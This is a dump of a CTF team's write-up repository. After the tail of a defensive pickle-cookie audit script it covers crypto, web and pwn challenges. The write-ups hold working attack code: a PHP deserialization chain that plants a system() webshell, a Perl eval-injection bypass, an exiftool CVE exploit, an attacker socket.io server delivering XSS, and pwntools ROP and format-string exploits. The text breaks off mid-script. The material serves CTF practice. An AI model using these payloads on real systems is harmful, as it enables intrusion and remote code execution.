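    if not data.startswith(b"!") or b"?" not in data:
        return []
    body = data.split(b"?", 1)[1]
    try:
        raw = base64.b64decode(body, validate=True)
        found = {op.name for op, _arg, _pos in pickletools.genops(raw)}
    except Exception:  # not base64 or not a well-formed pickle stream
        return ["UNPARSEABLE"]
    return sorted(found & DANGEROUS_OPS)


class Probe:
    """Constructed stand-in for an object whose pickle calls a function on load.
    It references the harmless builtin len(); the pickle is only inspected."""
    def __reduce__(self):
        return (len, ("abc",))


def legacy_body(value) -> bytes:
    """Constructed sample in the legacy layout; the signature part is a dummy."""
    return b"!ZHVtbXk=?" + base64.b64encode(pickle.dumps(["name", value], -1))


def demo() -> dict:
    secret = b"constructed-secret"  # sample value, not from the challenge
    good = encode_cookie("name", {"name": "guest"}, secret)
    # A pickle body signed with the correct secret: with the JSON codec it is
    # rejected at the parsing step, so a leaked secret no longer runs code.
    pbody = base64.b64encode(pickle.dumps(["name", {"name": Probe()}], -1))
    signed_pickle = b"!" + sign(secret, pbody) + b"?" + pbody
    return {
        "roundtrip": decode_cookie("name", good, secret),
        "tampered": decode_cookie("name", good[:-2] + b"AA", secret),
        "signed_pickle": decode_cookie("name", signed_pickle, secret),
        "audit_plain": audit_legacy_cookie(legacy_body({"name": "guest"})),
        "audit_probe": audit_legacy_cookie(legacy_body({"name": Probe()})),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, "->", val)
```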
-------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220319194544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194544.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320063212.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320063212.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320065410.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320065410.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320102408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320102408.png -------------------------------------------------------------------------------- /2022/tangerang CTF/Pasted image 20220320103533.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320103533.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205054.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205054.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205402.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205402.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205507.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205507.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205718.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205718.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205819.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205819.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222205926.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205926.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210046.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210140.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210140.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210201.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210201.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210316.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210316.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221222210324.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210324.png 
-------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211635.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211635.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211710.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211710.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211742.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211742.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223211801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211801.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223212147.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212147.png -------------------------------------------------------------------------------- /2022/x-mas-ctf-2022/Pasted image 20221223212155.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212155.png -------------------------------------------------------------------------------- /2023/ByuCtf-2023/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | archive: https://drive.google.com/drive/folders/12dwK2ehCbXgppxWXFanpri4Msy4N177Y?usp=share_link 3 | official_writeup: https://github.com/BYU-CSA/BYUCTF-2023/tree/main 4 | --- 5 | 6 | # chain 7 | 8 | ```python 9 | from pwn import * 10 | 11 | key = p64(0xe59f1024e59f0024).hex() 12 | key += p64(0xe1a01fa3e0413000).hex() 13 | key += p64(0xe1b010c1e0811143).hex() 14 | key += p64(0xe59f3010012fff1e).hex() 15 | key += p64(0x012fff1ee3530000).hex() 16 | key += p64(0x000210f8e12fff13).hex() 17 | 18 | key_list = [int(key[i:i+2],16) for i in range(0, len(key), 2)] 19 | 20 | array = [0xc2,0x9c,0x65,0x83,0x95,0x66,0xfa,0x15,0x5e,0x58,0x2f,0x23,0xac,0x4f,0xa1,0x4c,0x7d,0x1e,0x69,0x80,0x8c,0x4a,0x26,0x5b,0x5f,0x91,0x30,0xcf,0xc0,0x4d,0x97,0x9b,0xba,0x20,0x77,0x4c,0xf5,0xef,0x97,0x96,0x31,0x30,0x8c,0xe2] 21 | 22 | idx = [0x0e,0x03,0x1c,0x13,0x17,0x21,0x12,0x04,0x27,0x09,0x0d,0x22,0x1e,0x15,0x0b,0x24,0x1d,0x0a,0x18,0x2b,0x19,0x00,0x1b,0x2a,0x08,0x1f,0x20,0x25,0x02,0x1a,0x0c,0x29,0x07,0x05,0x11,0x28,0x14,0x16,0x23,0x0f,0x01,0x10,0x2c,0x06,0x26] 23 | 24 | print(len(array)) 25 | print(len(idx)) 26 | print(key_list) 27 | print(len(key_list)) 28 | 29 | for i in range(44): 30 | p = key_list[idx[i]] 31 | c = array[i] 32 | print(chr(p^c), end='') 33 | print() 34 | ``` 35 | 36 | ## Our Team Members Writeup 37 | 38 | - https://github.com/daffainfo/ctf-writeup/tree/main/BYUCTF%202023 39 | ``` 40 | Crypto Compact 41 | Crypto RSA1 42 | Crypto RSA2 43 | Crypto RSA3 44 | Crypto RSA4 45 | Crypto RSA5 46 | OSINT Legoclones 1 47 | OSINT Legoclones 2 48 | ``` 
-------------------------------------------------------------------------------- /2023/Cursedctf-2023/README.md: -------------------------------------------------------------------------------- 1 | ## Chall Archive: 2 | [https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing](https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing "https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing") 3 | 4 | ## Ourteam Writeup 5 | @daffainfo 6 | 7 | [https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023](https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023") 8 | 9 | 10 | -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164229.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164229.png -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164413.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164413.png -------------------------------------------------------------------------------- /2023/DiceCTF-2023/Pasted image 20230207164435.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164435.png -------------------------------------------------------------------------------- /2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png
--------------------------------------------------------------------------------
/2023/HackTMCTF-quals/README.md:
--------------------------------------------------------------------------------
# Crypto - d-phi-enc

Franklin Reiter's attack on related messages.

source: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/README.md

The attack applies when two different messages are encrypted with the same exponent e and modulus N, but the messages are related to each other, for example:

```
c1 = m^e % N
c2 = (m+constant)^e % N
```

In this challenge we are given the following two equations:

```
enc_d = ((1-k*phi)/e)^3 % N
enc_phi = (phi)^3 % N
```

From my own experiments computing d with e=3, k turned out to be relatively small, between 1 and 3, and most often 2, so I tried k=2. This is the script I used:

from: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/exploit.sage

```python
# SageMath script; N, enc_d, enc_phi and enc_flag are the values given by the challenge
def GCD(a, b):
    # Euclidean algorithm on polynomials over Zmod(N)
    while b:
        a,b = b, a % b
    return a.monic()
def franklinreiter(C1, C2, e, N):
    P.<phi> = PolynomialRing(Zmod(N))
    f1 = ((1+2*phi)//e)^e - C1
    f2 = phi^e - C2
    # the monic GCD is (x - phi), so phi is minus its constant term
    return -GCD(f1, f2).coefficients()[0]
phi = franklinreiter(enc_d, enc_phi, 3, N)
d = pow(3, -1, phi)
flag = hex(pow(enc_flag, d, N))[2:]
print(bytes.fromhex(flag)) #b"HackTM{Have you warmed up? If not, I suggest you consider the case where e=65537, although I don't know if it's solvable. Why did I say that? Because I have to make this flag much longer to avoid solving it just by calculating the cubic root of enc_flag.}"
```

Crypto write-ups from the problem setter: [https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto](https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto "https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto")

# WEB - Blog revenge

Blog revenge solver

```php
queries = array(
    new Query("ATTACH DATABASE '/var/www/html/images/$webshell' AS jctf;", array()),
    new Query("CREATE TABLE jctf.pwn (dataz text);", array()),
    new Query('INSERT INTO jctf.pwn (dataz) VALUES ("= system($_GET[0]); ?>");', array())
);

$username = "a";
$myobj = new User($username);
$myobj->profile = new Query("", "");
$myobj->profile->query_string = new User("");
$myobj->profile->query_string->profile = $conn;


$payload = base64_encode(serialize($myobj));
register($username);

$response = request($payload);
// echo $response;

shell($webshell);
```


## External writeup

[https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023](https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023")

- web/Blog

By: daffainfo

--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231049.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231049.png
--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231114.png
--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231338.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231338.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064030.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064030.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064152.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064152.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064305.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064305.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064318.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064318.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064420.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064420.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064435.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064435.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064452.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064452.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064534.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064618.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064618.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064721.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064721.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064755.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064755.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064820.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064820.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064919.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064919.png
--------------------------------------------------------------------------------
/2023/LACTF-2023/Pasted image 20230214115929.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/LACTF-2023/Pasted image 20230214115929.png
--------------------------------------------------------------------------------
/2023/LineCTF 2023/README.md:
--------------------------------------------------------------------------------
# Old Pal - web
## Description
How about an Old Pal for your aperitif?
http://104.198.120.186:11006/cgi-bin/main.pl?password=

## Exploit
In this challenge we are given the following source code.

```perl
#!/usr/bin/perl
use strict;
use warnings;

use CGI;
use URI::Escape;


$SIG{__WARN__} = \&warn;
sub warn {
    print("Hacker? :(");
    exit(1);
}


my $q = CGI->new;
print "Content-Type: text/html\n\n";


my $pw = uri_unescape(scalar $q->param("password"));
if ($pw eq '') {
    print "Hello :)";
    exit();
}
if (length($pw) >= 20) {
    print "Too long :(";
    die();
}
if ($pw =~ /[^0-9a-zA-Z_-]/) {
    print "Illegal character :(";
    die();
}
if ($pw !~ /[0-9]/ || $pw !~ /[a-zA-Z]/ || $pw !~ /[_-]/) {
    print "Weak password :(";
    die();
}
if ($pw =~ /[0-9_-][boxe]/i) {
    print "Do not punch me :(";
    die();
}
if ($pw =~ /AUTOLOAD|BEGIN|CHECK|DESTROY|END|INIT|UNITCHECK|abs|accept|alarm|atan2|bind|binmode|bless|break|caller|chdir|chmod|chomp|chop|chown|chr|chroot|close|closedir|connect|cos|crypt|dbmclose|dbmopen|defined|delete|die|dump|each|endgrent|endhostent|endnetent|endprotoent|endpwent|endservent|eof|eval|exec|exists|exit|fcntl|fileno|flock|fork|format|formline|getc|getgrent|getgrgid|getgrnam|gethostbyaddr|gethostbyname|gethostent|getlogin|getnetbyaddr|getnetbyname|getnetent|getpeername|getpgrp|getppid|getpriority|getprotobyname|getprotobynumber|getprotoent|getpwent|getpwnam|getpwuid|getservbyname|getservbyport|getservent|getsockname|getsockopt|glob|gmtime|goto|grep|hex|index|int|ioctl|join|keys|kill|last|lc|lcfirst|length|link|listen|local|localtime|log|lstat|map|mkdir|msgctl|msgget|msgrcv|msgsnd|my|next|not|oct|open|opendir|ord|our|pack|pipe|pop|pos|print|printf|prototype|push|quotemeta|rand|read|readdir|readline|readlink|readpipe|recv|redo|ref|rename|require|reset|return|reverse|rewinddir|rindex|rmdir|say|scalar|seek|seekdir|select|semctl|semget|semop|send|setgrent|sethostent|setnetent|setpgrp|setpriority|setprotoent|setpwent|setservent|setsockopt|shift|shmctl|shmget|shmread|shmwrite|shutdown|sin|sleep|socket|socketpair|sort|splice|split|sprintf|sqrt|srand|stat|state|study|substr|symlink|syscall|sysopen|sysread|sysseek|system|syswrite|tell|telldir|tie|tied|time|times|truncate|uc|ucfirst|umask|undef|unlink|unpack|unshift|untie|use|utime|values|vec|wait|waitpid|wantarray|warn|write/) {
    print "I know eval injection :(";
    die();
}
if ($pw =~ /[Mx. squ1ffy]/i) {
    print "You may have had one too many Old Pal :(";
    die();
}


if (eval("$pw == 20230325")) {
    print "Congrats! Flag is LINECTF{redacted}"
} else {
    print "wrong password :(";
    die();
};
```

To bypass all of those checks we can use the following payload.

```
20230325-v48
```

Here `v48` is equal to '0', so the expression evaluates to `20230325`, which is the password we need to supply.

# Imagexif - web
## Description
This site provides you with the information of the image(EXIF) file. But there is a dangerous vulnerability here. I hope you get the data you want with the various functions of the system and your imagination.

## Exploit
In this challenge we exploit [CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl).

Looking at the backend's Dockerfile, we find that the machine uses a vulnerable version of exiftool.

```dockerfile
RUN wget https://github.com/exiftool/exiftool/archive/refs/tags/12.22.tar.gz && \
    tar xvf 12.22.tar.gz && \
    cp -fr /exiftool-12.22/* /usr/bin && \
    rm -rf /exiftool-12.22 && \
    rm 12.22.tar.gz
```

We use the following PoC to get the flag: https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl.

Run the command above and an image named `notevil.jpg` will be produced; we send that image to the server and get the flag.

# Adult Simple GoCurl - web
In this challenge we need to make a request to `/flag`. Here we can take advantage of a feature of the Go gin module, `X-Forwarded-Prefix`; for details see https://github.com/gin-gonic/gin/pull/1238/commits/0906ea946d9f39dc5b8e9b4832d1eb9eaa8ca35f.

This feature changes the redirect issued by the Go server by adding the value we supplied to the `Location` header.

Here is the request I used to solve this challenge.

```http
GET /curl/?url=http://127.0.0.1:8080//&header_key=X-Forwarded-Prefix&header_value=/flag HTTP/1.1
Host: 34.84.87.77:11001
Connection: close
```

# Our Team Writeup
@daffainfo

https://github.com/daffainfo/ctf-writeup/tree/main/LINE%20CTF%202023

| Category | Challenge |
| --- | --- |
| Web | Baby Simple GoCurl |

@kaelanalysis

- https://github.com/maulvialf/CTF-Writeups/tree/main/2023/linectf
- https://maulvialf.medium.com/write-up-reverse-engingeering-line-ctf-2023-fishing-and-jumpit-18d5a6c3092e

- rev
  1. fishing
  2. jumpit
--------------------------------------------------------------------------------
/2023/Real-World-CTF/Pasted image 20230109172555.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Real-World-CTF/Pasted image 20230109172555.png
--------------------------------------------------------------------------------
/2023/Real-World-CTF/README.md:
--------------------------------------------------------------------------------
# web
---
## ChatUwU
We are given an attachment containing an application built on Node.js with the express and socket.io dependencies.

Straight to the point.
The vulnerability in the web app is on the client side, in the following code
`index.html`
```js
document.title += ' - ' + room;
let socket = io(`/${location.search}`), // <- vulnerable code
    messages = document.getElementById('messages'),
    form = document.getElementById('form'),
    input = document.getElementById('input');
```

socket.io takes location.search as its input.
We can manipulate location.search by adding foo@attacker.com to one of the URL parameters, for example
http://localhost:58000/?nickname=x@localhost:8000/?nickname=x&room=DOMPurify

This way we can change the socket.io endpoint to a WebSocket server that we control, so we can send malicious data containing a payload to get XSS on the client.

Here is the code I used for the attacker server:

```js
const http = require("http").Server();
const { Server } = require("socket.io");

const io = new Server(http, {
  cors: {
    origin: "http://localhost:58000",
  },
});

const hostname = "0.0.0.0";
const port = 8000;

let payload = btoa(`
  // xss payload here
  alert(1)
`)
payload = `

`;

io.on("connection", (socket) => {
  let { room } = socket.handshake.query;
  console.log(socket.handshake.query);

  socket.join(room);
  io.to(room).emit("msg", {
    from: "attacker",
    text: payload,
    isHtml: true,
  });
});

http.listen(port, hostname, () => {
  console.log(`ChatUWU server running at http://${hostname}:${port}/`);
});
```

--------------------------------------------------------------------------------
/2023/San-diego-ctf-2023/README.md:
--------------------------------------------------------------------------------
---
Archive: "https://drive.google.com/drive/folders/1xx240hie7UY9wiJSIHbDgwPoQdgIq3Uq?usp=sharing"
---

# tROPic-thunder - PWN

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host thunder.sdc.tf --port 1337 ./tROPic-thunder
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./tROPic-thunder')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'thunder.sdc.tf'
port = int(args.PORT or 1337)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

io = start()

bss = exe.bss()+0x200
rop = ROP(exe)

# padding up to the saved return address (bytes, so it can be joined with the chain)
p = b'a'*(112+8)

# read the file name into .bss, open it, read the file from fd 3, write it to stdout
rop.read(0,bss,0x40)
rop.open(bss,0,0)
rop.read(3,bss+0x100,0x100)
rop.write(1,bss+0x100,0x100)
p += rop.chain()
print(rop.dump())

io.sendlineafter(b"one!\n",p)

io.send(b"./flag.txt")

io.interactive()
```

# money-printer - PWN

```python
#!/usr/bin/python3
from pwn import *

# =========================================================
#                          SETUP
# =========================================================
exe = './money-printer'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'warn'

# =========================================================
#                         EXPLOITS
# =========================================================

flag = ""

for i in range(10, 16):
    try:
        # io = process(exe)
        io = remote('money.sdc.tf', 1337)
        # overwriting dollar variable
        io.sendlineafter(b'how many of them do you want?', b'-1')
        # format string vuln
        io.sendlineafter(b'to the audience?', f'%{i}$p'.encode())
        io.recvuntil(b'\n')
        leak = io.recvline()
        if b'nil' not in leak:
            print(f'stack at {i} :' + str(leak))
            try:
                # each leaked word holds 8 flag bytes in little-endian order
                hexform = unhex(leak.split()[3][2:].decode())
                flag += hexform.decode()[::-1]
                print('flag appended')
            except BaseException:
                pass
        io.close()
    except (EOFError, UnicodeDecodeError):
        pass

print(f'{flag=}')
```

# money printer2 - pwn

```python
# start() and exe are not defined in this snippet; they are assumed to come from
# a pwntools template like the one used for tROPic-thunder above
def exploit():
    io = start()

    # Step 1
    p ='-2147483647'
    io.sendline(p)

    p = '%p%c'+'%c'*(25-4) + '%{}c%hn'.format(0xdec8-0x24)
    p += '%{}c%51$hn'.format((0x10000 - 0xdec8) + 0x07e8) # dec8 d948
    io.sendlineafter('ence?\n',p)

    io.recvuntil('said: ')
    stack = int(io.recv(14),16)
    stack_canary = stack + 0x2698
    # print("Leak stack canary : " + str(hex(stack_canary)))
    print("Leak return stack : " + str(hex(stack_canary)))

    # Step 2
    p ='-2147483647'
    io.sendline(p)

    # 0x00000000004007e7 <+0>: push rbp
    # 0x00000000004007e8 <+1>: mov rbp,rsp

